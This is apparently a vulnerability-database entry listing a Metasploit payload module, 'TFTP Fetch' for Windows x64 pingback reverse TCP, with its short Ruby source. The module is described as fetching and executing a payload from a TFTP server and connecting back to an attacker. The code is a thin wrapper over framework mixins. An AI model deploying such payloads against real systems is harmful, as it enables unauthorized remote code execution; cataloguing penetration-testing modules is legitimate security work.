Lucene search

K
metasploitBrendan Watters, bwatters-r7MSF:PAYLOAD-CMD-WINDOWS-TFTP-X64-PINGBACK_REVERSE_TCP-
HistoryMay 18, 2023 - 3:47 p.m.

TFTP Fetch, Windows x64 Pingback, Reverse TCP Inline

2023-05-1815:47:29
Brendan Watters, bwatters-r7
www.rapid7.com
109
metasploit
tftp server
windows x64
reverse tcp
payload
adapter
brendan watters

AI Score

7.4

Confidence

Low

Fetch and execute an x64 payload from a TFTP server. Connect back to attacker and report UUID (Windows x64)

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule
  include Msf::Payload::Adapter::Fetch::TFTP
  include Msf::Payload::Adapter::Fetch::WindowsOptions

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'TFTP Fetch',
        'Description' => 'Fetch and execute an x64 payload from a TFTP server.',
        'Author' => 'Brendan Watters',
        'Platform' => 'win',
        'Arch' => ARCH_CMD,
        'License' => MSF_LICENSE,
        'AdaptedArch' => ARCH_X64,
        'AdaptedPlatform' => 'win'
      )
    )
  end
end

AI Score

7.4

Confidence

Low